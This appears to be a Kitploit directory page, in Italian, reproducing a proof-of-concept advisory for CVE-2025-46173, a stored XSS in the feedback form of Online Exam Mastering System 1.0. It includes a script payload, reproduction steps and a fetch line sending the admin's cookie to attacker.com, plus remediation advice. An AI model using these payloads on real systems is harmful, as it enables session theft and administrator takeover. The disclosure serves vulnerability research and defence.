Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-46173 — PoC per la CVE-2025-46173 | Kitploit
Strumenti/GitHubGitHub/pruthuraut/cve-2025-46173
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubpruthuraut/cve-2025-46173

CVE-2025-46173

PoC per la CVE-2025-46173

Vedi Repository
91 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-46173 - Cross-Site Scripting (XSS) memorizzato in Online Exam Mastering System 1.0

📌 Riepilogo

CVE-2025-46173 è una vulnerabilità di Cross-Site Scripting (XSS) memorizzato scoperta in Online Exam Mastering System 1.0 di code-projects. La vulnerabilità è presente nel componente feedback.php, dove l'input utente nel campo nome non viene adeguatamente sanificato, consentendo a un attaccante di iniettare JavaScript arbitrario. Quando un amministratore visualizza il feedback nella dashboard di amministrazione (dash.php), il payload viene eseguito nel browser dell'amministratore, portando al dirottamento della sessione e a una potenziale escalation dei privilegi.


🧠 Dettagli della vulnerabilità

  • Tipo di vulnerabilità: Cross-Site Scripting (XSS) memorizzato
  • ID CVE: CVE-2025-46173
  • Fornitore: code-projects
  • Prodotto: Online Exam Mastering System
  • Versione interessata: 1.0
  • Componente: feedback.php, dash.php
  • Vettore di attacco: Remoto
  • Impatto: Escalation dei privilegi, dirottamento della sessione

📷 Prova di concetto

1. Iniezione

Un utente invia il seguente payload nel campo Nome nel modulo di feedback:

<script>alert(document.cookie)</script>

Payload nel modulo di feedback

2. Attivazione

Quando l'amministratore visualizza successivamente il feedback inviato in dash.php, il payload viene eseguito:

Attivazione XSS da parte dell'amministratore

3. Risultato

Il cookie di sessione dell'amministratore viene esposto tramite document.cookie e può essere esfiltrato:

<script>
  fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>

⚙️ Passaggi per la riproduzione

  1. Clonare o configurare la versione vulnerabile da code-projects.

  2. Navigare a localhost/exam/feedback.php.

  3. Compilare il campo "Nome" con:

    <script>alert(document.cookie)</script>
    
  4. Inviare il modulo.

  5. Accedere come amministratore e visitare dash.php?q=3 per visualizzare il feedback.

  6. Lo script verrà eseguito nel contesto dell'amministratore.


🔥 Impatto

Lo sfruttamento riuscito consente a un attaccante remoto di:

  • Rubare i cookie di sessione dell'amministratore
  • Impersonare l'utente amministratore
  • Ottenere pieno accesso amministrativo
  • Modificare o eliminare i dati dei test
  • Elevare i privilegi

🔒 Rimedio consigliato

  • Sanificare l'input utente effettuando l'escaping dei caratteri HTML speciali (ad es., &, <, >, ").
  • Utilizzare una libreria di sanificazione robusta come htmlspecialchars() di PHP o una combinazione di validazione frontend e sanificazione backend.
  • Implementare una Content Security Policy (CSP).
  • Valutare la codifica dei dati prima di renderizzarli nel DOM.

🔗 Riferimenti

  • Blind Cross-Site Scripting (Invicti)
  • Acunetix - Rilevamento della Blind XSS
  • Cheat Sheet OWASP per la prevenzione delle XSS

👤 Scopritore

Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub


Gli screenshot sono solo a scopo educativo. Tutti i test sono stati effettuati in un ambiente locale.

🎥 Video PoC

Clicca qui per guardare il video demo


⚠️ Esclusione di responsabilità

Queste informazioni sono fornite solo a scopo educativo e di ricerca. Non utilizzarle su sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita a testare.

Scarica lo strumento